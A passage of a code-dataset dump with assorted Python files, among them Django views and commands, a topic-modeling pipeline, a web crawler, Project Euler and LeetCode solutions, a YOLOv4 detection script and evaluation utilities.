subcategory_submission.creditusersubmission_set.using(\n source_db).all())\n for credit_user_submission in (\n 
credit_user_submissions_to_restore):\n\n # First, clear any documentation_field_submissions for this\n # credit_user_submission from the target db.\n documentation_field_submissions_to_clear = (\n get_documentation_field_submissions(\n credit_user_submission=credit_user_submission,\n source_db=target_db))\n for documentation_field_submission in (\n documentation_field_submissions_to_clear):\n documentation_field_submission.delete()\n\n documentation_field_submissions_to_restore = (\n get_documentation_field_submissions(\n credit_user_submission=credit_user_submission,\n source_db=source_db))\n\n for documentation_field_submission in (\n documentation_field_submissions_to_restore):\n\n restore_documentation_field_submission(\n documentation_field_submission=documentation_field_submission,\n source_db=source_db,\n target_db=target_db)\n","sub_path":"stars/apps/institutions/management/commands/restore_institution.py","file_name":"restore_institution.py","file_ext":"py","file_size_in_byte":13135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"108294792","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport datetime\nimport functools\nimport logging\nimport os\nimport os.path\nimport pickle\nimport sys\nimport subprocess\n\nFORMAT = \"%(asctime)s %(levelname)8s:[%(filename)s:%(lineno)s - %(funcName)20s()] %(message)s\"\nlogging.basicConfig(level=logging.DEBUG,\n format=FORMAT,\n datefmt='%m-%d %H:%M:%S',\n filename='./idea_relations.log',\n filemode='w')\n\nimport dateutil.parser\n\nimport fighting_lexicon as fl\nimport idea_relations_runner as il\nimport mallet_topics as mt\nimport output_analyzer\nimport preprocessing\n\nis_windows = os.name == 'nt'\n\nSTEPS = 4\n\n\ndef parse_arguments(args):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--option\", type=str, choices=[\"topics\", \"keywords\"],\n help=(\"choose using topics or keywords to represent ideas,\"\n \" mallet_bin_dir is required if topic is chosen,\"\n \" background_file is required if keywords is chosen.\"),\n default=\"topics\")\n parser.add_argument(\"--input_file\",\n help=(\"input file, each line is a json object \"\n \"with fulldate and text\"),\n type=str)\n parser.add_argument(\"--data_output_dir\",\n help=(\"output directory for intermedia data\"),\n type=str)\n parser.add_argument(\"--final_output_dir\",\n help=(\"output directory for final results\"),\n type=str)\n parser.add_argument(\"--mallet_bin_dir\",\n help=(\"directory with Mallet binaries\"),\n type=str)\n parser.add_argument(\"--background_file\",\n help=(\"background file to learn important keywords\"),\n type=str)\n parser.add_argument(\"--group_by\",\n help=(\"binning option for timesteps, supports year, quarter, and month\"),\n type=str,\n default=\"year\")\n parser.add_argument(\"--prefix\",\n help=(\"name for the exploration\"),\n type=str,\n default=\"exp\")\n parser.add_argument(\"--num_ideas\",\n help=(\"number of ideas, i.e., \"\n \"number of topics or keywords\"),\n type=int,\n default=50)\n parser.add_argument(\"--tokenize\",\n help=(\"whether to tokenize\"),\n action=\"store_true\")\n parser.add_argument(\"--lemmatize\",\n help=(\"whether to lemmatize\"),\n action=\"store_true\")\n parser.add_argument(\"--nostopwords\",\n help=(\"whether to filter stopwords\"),\n action=\"store_true\")\n\n parser.add_argument(\"--objects_location\",\n help=(\"File name to store graph data in.\"\n \"If not given, no data will be stored\"),\n type=str,\n default=None)\n 
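The boolean options here use `action="store_true"`, which is the reliable argparse pattern; `type=bool` (as used for `--fixed_scale_bool` in the detect.py record further down) does not parse the string, so `--fixed_scale_bool False` still yields `True`. A short demonstration:

```python
import argparse

p = argparse.ArgumentParser()
p.add_argument('--good', action='store_true')  # False unless the flag is given
p.add_argument('--bad', type=bool, default=False)

print(p.parse_args([]).good)                 # False
print(p.parse_args(['--bad', 'False']).bad)  # True: bool('False') is True,
                                             # because any non-empty string is truthy
```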
parser.add_argument(\"--no_create_graphs\",\n help=(\"whether to create graphs of relations\"),\n action=\"store_true\")\n parser.add_argument(\"--force_create_topics\",\n help=(\"force the parser to recreate topic information instead of relying on existing files\"),\n action=\"store_true\")\n parser.add_argument(\"--start_time\",\n help=(\"Only consider documents from after this point in time\"),\n type=str,\n default=datetime.MINYEAR)\n parser.add_argument(\"--end_time\",\n help=(\"Only consider documents from before this point in time\"),\n type=str,\n default=datetime.MAXYEAR)\n\n return parser.parse_args(args=args)\n\n\ndef main(args=None, message_queue=None):\n args = parse_arguments(args)\n\n is_subprocess = args.objects_location is not None and message_queue is not None\n if is_subprocess: message_queue.put(\"Status:%d\" % STEPS)\n\n input_file = os.path.abspath(args.input_file)\n data_output_dir = os.path.abspath(args.data_output_dir)\n final_output_dir = os.path.abspath(args.final_output_dir)\n if not os.path.exists(data_output_dir):\n os.makedirs(data_output_dir)\n if not os.path.exists(final_output_dir):\n os.makedirs(final_output_dir)\n # Support some standard preprocessing\n if args.tokenize:\n # tokenize input_file to token_file\n logging.info(\"tokenizing data\")\n token_file = \"%s/tokens.jsonlist.gz\" % data_output_dir\n func = functools.partial(preprocessing.tokenize,\n filter_stopwords=args.nostopwords)\n preprocessing.preprocess_input(input_file, token_file)\n input_file = token_file\n\n # status message\n if is_subprocess: message_queue.put(\"Status:1\")\n\n if args.lemmatize:\n # lemmatize input_file to lemma_file\n logging.info(\"lemmatizing data\")\n lemma_file = \"%s/lemmas.jsonlist.gz\" % data_output_dir\n func = functools.partial(preprocessing.lemmatize,\n filter_stopwords=args.nostopwords)\n preprocessing.preprocess_input(input_file, lemma_file)\n input_file = lemma_file\n\n # status message\n if is_subprocess: message_queue.put(\"Status:2\")\n\n # generate topics or lexicons\n option = args.option\n num_ideas = args.num_ideas\n cooccur_func = functools.partial(il.generate_cooccurrence_from_int_set,\n num_ideas=num_ideas)\n prefix = args.prefix\n if option == \"topics\":\n logging.info(\"using topics to represent ideas\")\n prefix = \"%s_topics\" % prefix\n\n # generate mallet topics\n if args.force_create_topics or not mt.check_mallet_directory(data_output_dir):\n mt.get_mallet_input_from_words(input_file, data_output_dir)\n # run mallet to prepare topics inputs\n # users can also generate mallet-style topic inputs inputs\n logging.info(\"running mallet to get topics\")\n if not os.path.exists(os.path.join(args.mallet_bin_dir, 'mallet')):\n sys.exit(\"Error: Unable to find mallet at %s\" % args.mallet_bin_dir)\n if is_windows:\n path = '.\\mallet.bat'\n if not os.path.isfile(path):\n path = '.\\idea_relations\\mallet.bat'\n if not os.path.isfile(path):\n raise FileNotFoundError(\"Couldn't locate mallet.bat\")\n\n subprocess.call(\"%s %s %s %d\" % (path, args.mallet_bin_dir, data_output_dir, num_ideas),\n stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n else:\n path = './mallet.sh'\n if not os.path.isfile(path):\n path = './idea_relations/mallet.sh'\n if not os.path.isfile(path):\n raise FileNotFoundError(\"Couldn't locate mallet.bat\")\n\n subprocess.call(\"%s %s %s %d\" % (path, args.mallet_bin_dir, data_output_dir, num_ideas),\n shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n\n # load mallet outputs\n articles, vocab, idea_names = 
mt.load_articles(input_file, data_output_dir)\n table_top = 5\n elif option == \"keywords\":\n logging.info(\"using keywords to represent ideas\")\n prefix = \"%s_keywords\" % prefix\n # idenfity keyword ideas using fighting lexicon\n lexicon_file = \"%s/fighting_lexicon.txt\" % data_output_dir\n other_files = [args.background_file]\n fl.get_top_distinguishing(input_file, other_files, data_output_dir,\n lexicon_file)\n # load keywords\n articles, word_set, idea_names = fl.load_word_articles(input_file,\n lexicon_file,\n data_output_dir,\n vocab_size=num_ideas)\n table_top = 10\n else:\n logging.error(\"unsupported idea representations\")\n\n if is_subprocess: message_queue.put(\"Status:3\")\n\n default_time = datetime.datetime(1, 1, 1)\n\n start = dateutil.parser.parse(str(args.start_time), default=default_time)\n end = dateutil.parser.parse(str(args.end_time), default=default_time)\n\n if is_subprocess:\n # Output for the visualizer\n\n data = output_analyzer.get_output(args, articles, idea_names, cooccur_func, name=args.prefix,\n group_by=args.group_by, start_time=start, end_time=end)\n # Output data is a tuple of the form: (pmi, ts_correlation, ts_matrix, idea_names)\n pickle.dump(data, open(args.objects_location, 'wb'))\n\n message_queue.put(\"Status:4\")\n\n if not args.no_create_graphs:\n logging.info(\"Creating graphs\")\n # compute strength between pairs and generate outputs\n il.generate_all_outputs(articles, num_ideas, idea_names, prefix,\n final_output_dir, cooccur_func,\n table_top=table_top, group_by=args.group_by)\n return args\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"107488555","text":"import json\nfrom os import path\n\n\ndef num_class(df, predict_attr, treatment_attr):\n \"\"\"\n Returns the number of Responders and Non-responders in Treatment and Control group\n \"\"\"\n tr = df[(df[predict_attr] != 0) & (df[treatment_attr] == 1)] # Responders in Treatment group\n tn = df[(df[predict_attr] == 0) & (df[treatment_attr] == 1)] # Non-responders in Treatment group\n cr = df[(df[predict_attr] != 0) & (df[treatment_attr] == 0)] # Responders in Control group\n cn = df[(df[predict_attr] == 0) & (df[treatment_attr] == 0)] # Non-responders in Control group\n return tr.shape[0], tn.shape[0], cr.shape[0], cn.shape[0]\n\n\ndef split_class(df, predict_attr, treatment_attr):\n tr = df[(df[predict_attr] != 0) & (df[treatment_attr] == 1)] # Responders in Treatment group\n tn = df[(df[predict_attr] == 0) & (df[treatment_attr] == 1)] # Non-responders in Treatment group\n cr = df[(df[predict_attr] != 0) & (df[treatment_attr] == 0)] # Responders in Control group\n cn = df[(df[predict_attr] == 0) & (df[treatment_attr] == 0)] # Non-responders in Control group\n return tr, tn, cr, cn\n\n\ndef save_json(name, data):\n with open('output/' + name + '.json', 'w') as f:\n json.dump(data, f)\n\n\ndef load_json(name):\n filename = 'output/' + name + '.json'\n if path.exists(filename):\n with open(filename, 'r') as f:\n print('Open success:', filename)\n return json.load(f)\n else:\n print('Not exist', filename)\n return None\n\n\ndef ty_assign(y, t):\n if y == 1 and t == 1:\n return \"TR\"\n elif y == 0 and t == 1:\n return \"TN\"\n elif y == 1 and t == 0:\n return \"CR\"\n elif y == 0 and t == 0:\n return \"CN\"\n else:\n return None\n\n\ndef t_assign(ty):\n if ty in (\"TR\", \"TN\"):\n return 1\n elif ty in 
(\"CR\", \"CN\"):\n return 0\n else:\n return None\n\n\ndef y_assign(ty):\n if ty in (\"TR\", \"CR\"):\n return 1\n elif ty in (\"TN\", \"CN\"):\n return 0\n else:\n return None\n\n\ndef normalize(input_df, refer_vars=None):\n df = input_df.copy()\n normalize_vars = {}\n\n for col in df.columns:\n if refer_vars:\n min_max = normalize_vars.get(col)\n if min_max is None:\n continue\n min_val, max_val = min_max\n else:\n count = df[col].drop_duplicates().count()\n if count < 2:\n continue\n min_val = df[col].min()\n max_val = df[col].max()\n normalize_vars[col] = (min_val, max_val)\n\n df[col] = (df[col] - min_val) / (max_val - min_val)\n\n return df, normalize_vars\n\n\ndef denormalize(input_df, normalize_vars):\n df = input_df.copy()\n\n for col in df.columns:\n min_max = normalize_vars.get(col)\n if min_max is None:\n continue\n\n min_val, max_val = min_max\n df[col] = df[col] * (max_val - min_val) + min_val\n\n return df\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"528592290","text":"'''\nCrie um programa que encontre a letra que mais se repetiu em uma sentença\n'''\n'''\ndef whosMost(s):\n cont = list()\n letras = []\n for l in s.lower().replace(' ', ''):\n if l in letras:\n cont[letras.index(l)] += 1\n else:\n letras.append(l)\n cont.append(1)\n del letras[len(letras)-1]; del cont[len(cont)-1]\n return print('A letra que mais se repete é a {} e ela se repete {} vezes'.format(letras[cont.index(max(cont))].upper(), max(cont)))\n\nwhosMost(str('How do you do?'))\n'''\ns = 'How do you do?'\ncont = list()\nletras = []\nfor l in s.lower().replace(' ', ''):\n if l in letras:\n letras[letras.index(l) + 1] += 1\n else:\n letras.append(l)\n letras.append(1)\nprint(letras)\n\n","sub_path":"ExercisesPython/mostwanted.py","file_name":"mostwanted.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"196206533","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nPE_0112\n\nBouncy numbers\n\nCreated on Mon Oct 10 12:12:07 2016\n@author: mbh\n\"\"\"\n\nimport time\nimport itertools as it\n\n#mine -about 7 s.\ndef p112(p): \n t=time.clock()\n bouncy=0\n for n in it.count():\n ns=[int(x) for x in str(n)]\n if all(x>=y for x, y in zip(ns, ns[1:])) or all(x<=y for x, y in zip(ns, ns[1:])):\n continue\n bouncy+=1\n if bouncy/n==p:break\n print(n,time.clock()-t)\n\n#from hansaplast - about 2.6 s\ndef hansaplast(p):\n t=time.clock()\n i,b=100,0\n while b/i < p:\n \ti,s,ss = i+1,str(i+1),\"\".join(sorted(str(i+1)))\n \tb = b if s == ss or s == ss[::-1] else b+1\n print(i,time.clock()-t)\n\n \n#from Stack exchange user 6502 \n#http://stackoverflow.com/questions/4983258/python-how-to-check-list-monotonicity\ndef strictly_increasing(L):\n return all(xy for x, y in zip(L, L[1:]))\n \ndef non_increasing(L):\n# return all(x>=y for x, y in zip(L, L[1:]))\n for i in range(len(L)-1):\n if L[i+1]-L[i]>0:\n return False\n return True\n \ndef non_decreasing(L):\n# return all(x<=y for x, y in zip(L, L[1:]))\n for i in range(len(L)-1):\n if L[i+1]-L[i]<0:\n return False\n return True\n \nimport time\ndef p112v2(p): \n t=time.clock()\n xs=0\n n=0\n while n<15:\n xi,xd=0,0 \n n+=1\n for x in range(10):\n if x>0:\n xi=hi(x,n)\n xd=di(x,n)\n xs+=xi+xd\n if 1-(xs-10*n)/(10**n-1)>=p:\n print(n,xs-10*n,1-(xs-10*n)/(10**n))\n break\n \n nmin=10**(n-1)\n nmax=10**(n)\n ntry=3*10**(n-1)\n \n 
\n\n\ndef hi(x,n,memo={}):\n if x==1:\n return 1\n if x==2:\n return n\n if n==1:\n return 1\n if n==2:\n return x\n try:\n return memo[(x,n)]\n except KeyError:\n result=hi(x,n-1,memo)+hi(x-1,n,memo)\n memo[(x,n)]=result\n return result\n\ndef di(x,n,memo={}):\n if x==9:\n return 1\n if x==8:\n return n\n if n==1:\n return 1\n if n==2:\n return 10-x\n try:\n return memo[(x,n)]\n except KeyError:\n result=di(x,n-1,memo)+di(x+1,n,memo)\n memo[(x,n)]=result\n return result ","sub_path":"PE_0112/PE_0112.py","file_name":"PE_0112.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"456171706","text":"from django.conf.urls import url\nfrom django.urls import include\nfrom django.views.generic import RedirectView\nfrom django.contrib.gis import admin\n\nfrom django.contrib.staticfiles import views as staticviews\n\nfrom cms import views as cms_views\nfrom destinations import views as dest_views\n\nfrom django.conf import settings\n\nurlpatterns = [\n # Home view, which is also the directions and explore views\n url(r'^$', dest_views.home, name='home'),\n url(r'^explore$', dest_views.explore, name='explore'),\n\n # App manifest and service worker for PWA app\n url('^manifest.json$', dest_views.manifest),\n url('^service-worker.js$', dest_views.service_worker),\n\n # Privacy policy and ToS\n url(r'^privacy_policy$', dest_views.privacy_policy, name='privacy_policy'),\n url(r'^terms_of_service$', dest_views.terms_of_service, name='terms_of_service'),\n\n # User destination flags\n url(r'^api/user_flag/', dest_views.UserFlagView.as_view()),\n\n # Map\n url(r'^api/destinations/search$', dest_views.SearchDestinations.as_view(),\n name='api_destinations_search'),\n url(r'^map/reachable$', dest_views.FindReachableDestinations.as_view(), name='reachable'),\n\n # Handle pre-redesign URLs by redirecting\n url(r'^(?:map/)?directions/', RedirectView.as_view(pattern_name='home', query_string=True,\n permanent=True)),\n\n # Places\n url(r'^place/(?P[\\d-]+)/$', dest_views.place_detail, name='place-detail'),\n\n # Events\n url(r'^event/(?P[\\d-]+)/$', dest_views.event_detail, name='event-detail'),\n\n # Tours\n url(r'^tour/(?P[\\d-]+)/$', dest_views.tour_detail, name='tour-detail'),\n\n # About (no more FAQ)\n url(r'^(?Pabout)/$', cms_views.about_faq, name='about'),\n\n # All Published Articles\n url(r'^api/articles$', cms_views.AllArticles.as_view(), name='api_articles'),\n\n # Community Profiles\n url(r'^learn/$', cms_views.learn_list, name='learn-list'),\n url(r'^learn/(?P[\\w-]+)/$', cms_views.learn_detail, name='learn-detail'),\n\n # Link Shortening\n url(r'^link/', include('shortlinks.urls', namespace='shortlinks')),\n\n url(r'^admin/', admin.site.urls),\n]\n\nif settings.DEBUG:\n urlpatterns += [\n url(r'^static/(?P.*)$', staticviews.serve),\n ]\n","sub_path":"python/cac_tripplanner/cac_tripplanner/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"366215374","text":"#URL: https://leetcode.com/problems/best-time-to-buy-and-sell-stock/\n#Description\n\"\"\"\nYou are given an array prices where prices[i] is the price of a given stock on the ith day.\nYou want to maximize your profit by choosing a single day to buy one stock and choosing a different \nday in the future to sell that stock.\nReturn the maximum profit you can achieve from this transaction. 
If you cannot achieve any profit, \nreturn 0.\n\n\nExample 1:\n\nInput: prices = [7,1,5,3,6,4]\nOutput: 5\nExplanation: Buy on day 2 (price = 1) and sell on day 5 (price = 6), profit = 6-1 = 5.\nNote that buying on day 2 and selling on day 1 is not allowed because you must buy before you sell.\n\n\nExample 2:\n\nInput: prices = [7,6,4,3,1]\nOutput: 0\nExplanation: In this case, no transactions are done and the max profit = 0.\n\n\nConstraints:\n\n1 <= prices.length <= 105\n0 <= prices[i] <= 104\n\"\"\"\ndef maxProfit(prices):\n sz = len(prices)\n beg = 0\n end = 1\n max_profit = 0\n while end < sz:\n if prices[end] > prices[beg]:\n diff = prices[end] - prices[beg]\n if diff > max_profit:\n max_profit = diff\n else:\n beg = end\n end += 1\n return max_profit\n\n","sub_path":"leetcode/dp/max_profit.py","file_name":"max_profit.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"218120198","text":"#BEGIN HEADER\n#############/Functor Code\\#############\n#END HEADER\n\n\ndef getOutputCalledFunction(self,*Args,**Kwargs):\n\t'''\n\t\tCall recursively a list of Functions for a list of Args\n\t'''\n\t\"\"\"\n\t\tdef add(x,y):\n\t\t\treturn x+y;\n\t\tdef multiply(x,y):\n\t\t\treturn x*y;\n\n\t\t#Get a Functor\n\t\tFunctor=_.getInstanceWithName(\"Functor\")+{'CalledFunctionsList':[add,multiply]};\n\n\t\t#Init the recursive Call\n\t\tFunctor.CalledFunctionIdx=0;\n\t\tprint('Final Output is : '+str(reduce(Functor.getOutputCalledFunction,[1,2],0)));\n\t\"\"\"\n\t\n\t#Debug\n\tsys.modules['SysPyModule'].printDebug('Start');\n\t\t\n\t#Check that the Idx is correct\n\tif self.CalledFunctionIdx0:\n\t\n\t\t#Init the Idx\n\t\tself.CalledFunctionIdx=0;\n\t\t\n\t\t#Scan the CalledFunctionsList\n\t\twhile self.CalledFunctionIdx\")\n HOMEPAGE = input(\"Give web page>\")\n #sys.stderr.write(\"E: Usage \" + arglist[0] + \" \")\n #sys.stderr.flush()\n #exit(2)\n\nelse:\n PROJECT_NAME = arglist[1]\n HOMEPAGE = arglist[2] #'http://yle.fi/'\n\nDOMAIN_NAME = get_domain_name(HOMEPAGE)\nWAITING_LIST_FILE = PROJECT_NAME + '/queue.txt'\nCRAWLED_FILE = PROJECT_NAME + '/crawled.txt'\nNUMBER_OF_SPIDERS = 8\nqueue = Queue()\nSpider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)\n\n\ndef work():\n while True:\n url = queue.get()\n Spider.crawl_page(threading.current_thread().name, url)\n queue.task_done()\n\n\n\ndef create_spiders():\n for _ in range(NUMBER_OF_SPIDERS):\n t = threading.Thread(target=work)\n t.daemon = True\n t.start()\n\n\ndef create_jobs():\n for link in file_to_set(WAITING_LIST_FILE):\n queue.put(link)\n queue.join()\n crawl()\n\n\ndef crawl():\n links = file_to_set(WAITING_LIST_FILE)\n if len(links)>0:\n print(str(len(WAITING_LIST_FILE)) + ' links to waiting list')\n create_jobs()\n\n\n\n\ncreate_spiders()\ncrawl()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"271203860","text":"# Copyright (c) 2013 Juniper Networks, Inc. 
All rights reserved.\n#\nimport commands\nimport sys\n\n\n\ndef main(args_str=None):\n\n ports_str = sys.argv[1]\n\n status, output = commands.getstatusoutput(\"cat /proc/sys/net/ipv4/ip_local_reserved_ports\")\n if status != 0:\n sys.exit(-1)\n else:\n existing_ports = output\n\n status, output = commands.getstatusoutput(\"sysctl -w net.ipv4.ip_local_reserved_ports=%s,%s\" % (ports_str, existing_ports))\n\n if status != 0:\n sys.exit(-1)\n\n status, output = commands.getstatusoutput(\"grep '^net.ipv4.ip_local_reserved_ports' /etc/sysctl.conf > /dev/null 2>&1\")\n\n\n if status != 0: \n status, output = commands.getstatusoutput('echo \"net.ipv4.ip_local_reserved_ports = %s\" >> /etc/sysctl.conf' % ports_str)\n else:\n status, output = commands.getstatusoutput(\"sed -i 's/net.ipv4.ip_local_reserved_ports\\s*=\\s*/net.ipv4.ip_local_reserved_ports=%s,/' /etc/sysctl.conf\" % ports_str)\n\n if status != 0:\n sys.exit(-1)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"Dockerfiles/dns/modules/contrail.old/files/add_reserved_ports.py","file_name":"add_reserved_ports.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"284585034","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nimport sys\nimport cv2\nimport copy\nimport math\nimport glob\nimport time\nimport argparse\nimport colorsys\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\n\nfrom model.yolov4 import Yolov4\nfrom model.yolov4_tiny import Yolov4_tiny\n\nfrom utils.anchors import yolo_anchors\n\nfrom utils.postprocess import postprocess\nfrom utils.nms import yolov4_nms\n\n\n# In[ ]:\n\n\ndef parse_args(args):\n parser = argparse.ArgumentParser(description='Simple detection script for using ScaledYOLOv4.')\n parser.add_argument('--model_type', default='tiny',help=\"choices=['tiny','p5','p6','p7']\")\n parser.add_argument('--image_directory', default='./image_directory')\n parser.add_argument('--img_save_path', default='./lossvsepoch_img_save_path')\n parser.add_argument('--checkpoint_dir', default='./checkpoint_dir')\n parser.add_argument('--class_names', default='class_names.names',help=\"voc.names\")\n parser.add_argument('--optimizer', default='Adam', help=\"choices=[Adam,sgd]\")\n parser.add_argument('--fixed_scale_bool', default='False', type=bool,help=\"choices=[True,False]\")\n parser.add_argument('--fixed_scale', default=608, type=int)\n parser.add_argument('--detect_img_size', default=608, type=int)\n parser.add_argument('--drop_block', default='False', help=\"choices=[True,False]\")\n parser.add_argument('--scales_x_y', default=[2., 2., 2., 2., 2.])\n parser.add_argument('--nms', default='diou_nms', help=\"choices=['diou_nms','hard_nms']\")\n parser.add_argument('--nms_max_box_num', default=100, type=int)\n parser.add_argument('--nms_iou_threshold', default=0.20, type=float)\n parser.add_argument('--nms_score_threshold', default=0.25, type=float)\n parser.add_argument('--save_method', default='.ckpt', help=\"choices=['.ckpt','h5']\")\n \n return parser.parse_args(args) \n\n\n# In[8]:\n\n\ndef detect_batch_img(img,model,args):\n\n pred = model.predict(img)\n pre_nms_decoded_boxes,pre_nms__scores = postprocess(pred,args)\n pre_nms_decoded_boxes = pre_nms_decoded_boxes.numpy()\n pre_nms__scores = pre_nms__scores.numpy()\n boxes, scores, classes, valid_detections = yolov4_nms(args)(pre_nms_decoded_boxes, pre_nms__scores, args)\n\n return boxes, 
scores, classes, valid_detections\n\n\n# In[9]:\n\n\ndef main(args):\n \n f = open(args.class_names)\n labels = f.read().splitlines()\n class_num = len(labels)\n \n if args.model_type == \"tiny\":\n print('tiny activated')\n model = Yolov4_tiny(args, training=True)\n \n elif args.model_type == \"p5\":\n model = Yolov4(args, training=True)\n \n elif args.model_type == \"p6\":\n model = Yolov4(args, training=True)\n \n else:\n model = Yolov4(args, training=True)\n \n # optimizer\n if args.optimizer == 'Adam':\n optimizer = tf.keras.optimizers.Adam()\n elif args.optimizer == 'sgd':\n optimizer = tf.keras.optimizers.SGD()\n \n if args.save_method == '.ckpt':\n root = tf.train.Checkpoint(optimizer=optimizer,model=model)\n manager = tf.train.CheckpointManager(root,args.checkpoint_dir, max_to_keep=3)\n print(manager.checkpoints)\n root.restore(manager.latest_checkpoint).expect_partial()\n elif args.save_method == '.h5':\n file_paths = os.listdir(args.checkpoint_dir)\n\n if len(file_paths) == 0:\n print('No h5 in folder')\n else:\n for File in file_paths:\n if File.endswith(\".h5\"):\n model.load_weights(args.checkpoint_dir + '\\yolo.h5',by_name=True, skip_mismatch=True)\n print('Restored from .h5')\n \n hsv_tuples = [(1.0 * x / class_num, 1., 1.) for x in range(class_num)]\n colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))\n colors = list(map(lambda x: (int(x[0] * 255.), int(x[1] * 255.), int(x[2] * 255.)), colors))\n \n if args.fixed_scale_bool == True:\n input_size = args.fixed_scale\n else:\n input_size = args.detect_img_size\n \n files=glob.glob(args.image_directory + '\\*.jpg')\n for i in range(len(files)):\n start=time.time()\n base_name = os.path.basename(files[i])\n \n x_img_string = tf.io.read_file(files[i])\n original_image = tf.io.decode_jpeg(x_img_string, channels=3)\n original_image = tf.image.convert_image_dtype(original_image, tf.float32)\n org_h,org_w,_ = original_image.shape\n resize_ratio = min(input_size / org_w, input_size / org_h)\n image_resize = tf.image.resize_with_pad(image = original_image,target_height = input_size,\n target_width = input_size)\n\n \n resize_ratio_tile = np.tile([resize_ratio],4) \n image_resize_shape = image_resize.shape\n image_data =np.expand_dims(image_resize, axis=0)\n \n #converted to numpy for the purpose of plotting boxes\n original_image_ny = original_image.numpy()*255\n \n boxes,scores,classes,valid_detections = detect_batch_img(image_data, model,args)\n\n batch_index = 0\n valid_boxes = (boxes[batch_index][0:valid_detections[batch_index]]) * image_resize_shape[0]\n valid_boxes = valid_boxes/resize_ratio_tile\n valid_classes = classes[batch_index][0:valid_detections[batch_index]]\n valid_scores = scores[batch_index][0:valid_detections[batch_index]]\n \n count_detected = valid_boxes.shape[0]\n for i in range(count_detected):\n box = valid_boxes[i][:4]\n x1 = int(box[0] - (input_size-(org_w/(1/resize_ratio))))\n if x1<0:\n x1 = 0\n \n y1 = int(box[1] - (input_size-(org_h/(1/resize_ratio))))\n if y1<0:\n y1 = 0\n \n x2 = int(box[2] - (input_size-(org_w/(1/resize_ratio))))\n if x2>org_w:\n x2 = org_w\n \n y2 = int(box[3] - (input_size-(org_h/(1/resize_ratio))))\n if y2>org_h:\n y2 = org_h\n\n valid_class = valid_classes[i]\n \n fontScale = 0.5\n score = valid_scores[i]\n bbox_color = colors[valid_class]\n bbox_thick = 2\n c1, c2 = (x1, y1), (x2, y2)\n \n cv2.rectangle(original_image_ny, (x1,y1) ,(x2,y2), bbox_color, bbox_thick)\n \n bbox_mess = '%s: %.2f' % (labels[valid_class], score)\n t_size = cv2.getTextSize(bbox_mess, 0, 
fontScale, thickness=bbox_thick // 2)[0]\n c3 = (c1[0] + t_size[0], c1[1] - t_size[1] - 3)\n cv2.rectangle(original_image_ny, c1, (np.float32(c3[0]), np.float32(c3[1])), bbox_color, -1) #filled\n\n cv2.putText(original_image_ny, bbox_mess, (c1[0], np.float32(c1[1] - 2)), cv2.FONT_HERSHEY_SIMPLEX,fontScale, (0, 0, 0), bbox_thick // 2, lineType=cv2.LINE_AA)\n \n tf.keras.preprocessing.image.save_img(args.img_save_path + '\\{}'.format(base_name),original_image_ny)\n# plt.imshow(image_resize_ny) \n end=time.time()\n print(f\"Runtime of the program is {end - start}\")\n\n\n# In[10]:\n\n\nif __name__ == \"__main__\":\n args = parse_args(sys.argv[1:])\n main(args)\n\n","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":7295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"483741137","text":"import os\nimport numpy as np\nfrom collections import defaultdict\n\ndef tree(): return defaultdict(tree)\n\ndef readFile(filepath):\n f = open(filepath)\n content = f.read()\n f.close()\n return content.splitlines()\n\nif __name__ == '__main__':\n path = '../../subjects/'\n subjects = readFile(path + 'uselist-testclass')\n g = 4\n tc = 1.5\n result = tree()\n apps = ['greedytotal_withouttime.txt','greedyadditional_withouttime.txt','genetic_withouttime.txt','arp_withouttime.txt','greedytotal_withtime.txt','greedyadditional_withtime.txt','genetic_withtime.txt','arp_withtime.txt','random']\n for subject in subjects:\n subject_path = path + subject + '/testclass/'\n for app in apps:\n if app != 'random':\n temp_apfdc = eval(readFile(subject_path + str(tc) + 'avg-new/evaluate/' + str(g) + '/apfdc_total/' + app)[0])\n else:\n temp_list = []\n for i in range(50):\n temp_list.append(eval(readFile(subject_path + str(tc) + 'avg-new/evaluate/' + str(g) + '/apfdc_total/' + app + str(i) + '.txt')[0]))\n temp_apfdc = np.mean(temp_list)\n temp_ft = eval(readFile(subject_path + str(tc) + 'avg-new/evaluate/' + str(g) + '/dectedtime/firsttime/' + app)[0])\n temp_at = eval(readFile(subject_path + str(tc) + 'avg-new/evaluate/' + str(g) + '/dectedtime/averagetime/' + app)[0])\n result[subject][g][tc][app]['apfdc'] = temp_apfdc\n result[subject][g][tc][app]['ft'] = temp_ft\n 